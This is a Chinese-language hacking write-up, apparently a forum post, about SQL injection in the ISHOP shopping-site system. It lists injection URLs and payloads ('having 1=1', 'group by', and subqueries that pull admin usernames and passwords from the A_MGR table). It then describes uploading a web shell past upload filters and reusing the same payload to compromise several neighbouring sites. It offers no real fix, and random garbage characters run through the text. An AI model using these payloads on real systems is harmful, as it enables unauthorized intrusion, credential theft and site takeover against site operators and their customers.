ISHOP商场建站系统注入漏洞

admin

发现一个注入点
http://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389

$ y/ D" i2 F, t) _7 R8 z习惯性的加’having1=1--

% T3 g. P& [; d) xhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—

0

爆出Diary_A.dl_Title（这时候很激动啊）
9 m( ~( N- x5 n$ b( k8 G( p, e  f$ U
那么继续
9 _- a; r8 w; D& @http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—
1 c9 q. J1 ]8 `! l# T  ~
继续，一直爆下去

% u4 Q3 _# S* I' |4 e爆到几个字段和表段 但是没找到需要的管理用户的字段
- B% I6 d, c) n& ~
蛋疼了 怎么办 然后去后台登陆页看源码

0
0 x) ?! f# T( L; z/ Z4 z
0 H( M! [- L# I" C9 zInput name= “ADUID”
Input name= “ADPWD”
1 y! X3 r2 I% n* s+ e" {6 {  z7 b% R
" @& \9 m& U( E3 h很幸运 找到了字段那就继续
找到之后开始爆用户
+ W8 `1 D& G: k4 xhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—
爆密码
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—
, Q9 s5 Z7 `3 N$ i% U* s测试了下 这个注入点只能爆到文章哪里的表

$ T2 E. `8 I! W$ {8 U& m$ g头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了
; z0 Q. ^) O5 s" q2 @
9 z8 d# B3 F3 ]9 w$ N又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了

473
; k, _6 `' y# g# o
# V4 N3 V8 F. X进后台
- C* z* B& M/ \4 P- _

发现几个上传点 有的地方不能上传 而且防止恶意代码

没办法 各种百度各种找大牛 找到一只好像可以突破的马

3 h2 ?  j+ \! l6 `* P! Z
在系统管理那里直接上传 不过没有显示地址
2 r, h; @( e, h5 A' x8 O
1 w4 I2 u! f  x. N& ]再上传一次 抓包 搞定OK
. [4 C' p' S7 ^/ H$ m! E  l

: q5 d! t4 y6 f! f
/ K& a# N, ?- M472
% u* x8 B8 s+ N0 Y6 ]; B
晚上不行了 去睡觉。。。
0 U. I& ^0 G+ P$ w第二天刚起床 闲的没事做继续日站吧

" q# V6 v8 G! G: ?4 l找个站 就把这个站的旁c扫了下
3 _& V: G& p* h6 s
发现c段也有一个购物站 ，然后还和这个站的模板差不多
8 {1 o: b. Z! G' B3 z8 B
就找到会员登录口测试

'and (select top 1 MGR_UID from A_MGR)>0—
. I/ e- l; Q' ~  m, ?果断爆到了 这时候我很激动 通杀
7 {! c  B: y/ D& ^
再次翻c段

翻出几个站 都成功拿下
; _( n# \6 N+ C) ^
- O' x" C& f' J# ^+ S4 _5 t
3 g2 ]% H) ~$ o0 q" u0 _
8 A: M/ Z* M. {修复方案：
他们比我专业
; U+ S9 I$ }' g, l​


" b; v0 @! U+ R